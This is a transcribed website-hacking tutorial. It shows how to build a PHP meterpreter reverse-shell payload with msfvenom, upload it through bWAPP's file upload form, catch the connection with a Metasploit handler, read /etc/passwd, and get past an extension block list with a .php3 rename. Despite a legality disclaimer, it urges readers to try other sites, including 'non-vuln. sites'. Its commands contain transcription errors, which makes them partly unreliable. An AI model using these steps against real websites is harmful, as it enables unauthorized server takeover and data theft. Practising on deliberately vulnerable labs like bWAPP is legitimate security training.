a big disclaimer hacking is illegal if you want to do any hacking running either in your virtualized environment or in your own website and if you really want to test out those different kind of hacking techniques on different sites check out those black bounty program because you could earn a dollar too and if you’re able to run any of these hacking techniques and get a bug bounty for it all right
Intro :-
in this you will just upload a file and you will get full control of the entire website
website hacking tutorial kali linux :-
i have bwapp so bwapp is a vulnerable web application system for us to run all adequate hacking techniques on and of course right here we have an option to browse and upload an image all right so let’s go ahead and click on it and right in front of us i actually have several payloads that we can upload into the website that will give us control of the entire site. so you can try diff sites also
how can we create that ?
this kind of malicious payload what you can do now is go ahead and open up terminal all right so i have terminal running right here and what we can do next is to go ahead and use msvenom to create the malicious payload and msfvenom is part of the metasploit family
where we can create different kind of payloads and we can create payloads like a malicious mobile application file we can create payloads in for android devices for ios and in this case we’re targeting a php application server so all we’re going to do is enter msfvenom -p for payload followed by php/meterpreters/reverse_tcp
all right and then we can specify the ip address of the attacker machine or the hacker’s machine in this case 192 168.0.12 so if i go ahead and open up another terminal and i enter ifconfig or ipaddr i can see the ip address right here so this is the hacker’s ip address so we have 192 168.0.12
so going back to the earlier statement here we can enter l hosts followed by l port or 4444 so this is something that you want to remember because later when we go to metasploit framework we will require all the options here all right and all the values here in order to ensure that we get a successful reverse shell all right so once you’ve got this running over here all you’re going to do is enter -f raw and output this and to say for example “hackerlaw.php”
command = msfvenom -p php/meterpreters/reverse_tcp LHOST=192.168.0.12 ( enter your ip ) LHOST=4444 -f raw > hackerlaw.php
exploiting | website hacking
okay so that can be the option that we do right here okay and once we enter on this we are creating the malicious reverse shell so here you can see the following which is payload size one one one four and i can move the file all right so you can move the file into like desktop you can move the file to whichever you want so i can move it as hacker all right move hackerlaw.php
all right two dot slash and i’m going to move it into my desktop folder in this case i’ll name it as hacker.reverseshell.php hit enter on that and we would have moved the file over so go back to browse and click on to hacker.reverse.php double clicked on it and click upload so once you click upload it states the following the image has been uploaded here
now what we’re going to do next is start up our listener okay so go ahead and go into one of terminal that will open up so enter sudo msfconsole so this will start our metasplot-framework for us and go ahead and hit enter on that so now that we’ve set up the metasploit framework you can go ahead and enter use exploit/multi/handler then after which all you got to do now is set the payload set payload so remember
earlier php/meterpreter/reverse_tcp
once you hit enter on this enter show option and we can see the options available for us and we can set all the values that we can enter into the payload options so enter set lhost 192.168.0.12 which is the ip address of kali linux that we’re using as the hackers box all right so next up all you got to do now is go ahead and enter exploit and that’s it we’re waiting with a tcp handler so once we are back into the website we click onto the following link which is the image that’s been uploaded here all right you see that there’s a loading on a tab
and if i go back into metasploit-framework you can see the following but to a session one open and all i got to do is enter help and we can see the list of instructions that can give us information about system so i can enter
sysinfo
and we can see that this is b box and this is php/linux and i can enter shell so that we can gain access to like a bash shell that is running inside the operating system and i can enter whoami
and we can see here www-data so we are actually inside and can enter print working directory so here we are at var/www/bwabp/images and i can enter cad /etc/passwd let’s see what we get we get all of the users who are actually inside the system so you can see here we have root ,admin games mail news and all these different details right here and we are literally in this is it game over
Problems and fixes ( for non-vuln. sites )
now the problem is what if there’s some kind of fall restriction when you’re uploading it and you’re not able to get past it well let’s take a look at it how we can bypass that now going back under unrestricted file upload
so in this case we have the following browse and i double click on the hacker.reverseshell.php and go ahead and click upload and it’s just following ” we have an error here sorry the file extension is not allowed the following extensions are blocked ” okay so if you have .asp .aspx .dll .exe .jsp and. php are blocked so which means that our file now no longer is going to be able to be uploaded into the site
so what can we do so one other good example that we can take a look at over here is actually on the php extension file name all right so if you go over into search we actually have php3 so we have another option of a file extension called php3 this allows the ability to rename the file extension as we’re uploading into php3 which can then bypass those file restrictions of the extensions all right so now what we can do is i can go to this site to convert this file
site http://www.learningaboutelectronics.com/PHP-script-to-convert-web-page-file-extensions.php
metasploit and ensure that we have our session running all right so go ahead and enter exploit again and this will start the reverse tcp handler on the attacker’s ip address of 192.168.0.12 followed by port 4444. so once i go back into the browser i can go ahead and click under the following which is the uploaded file so go ahead and click on that
go back to meta exploit over here and you will see that we are in it and its game over metabo session to open and what i can do now is enter sysinfo hit enter on that that’s it once again we’re in all right computer b box multiple php slash linux and i can enter shell enter who am i once again we are saying that we have www-data and we are in i can print working directory we can do whatever we want into the computer system so what we can do now is to go back into into the computer system so how can we
Post a Comment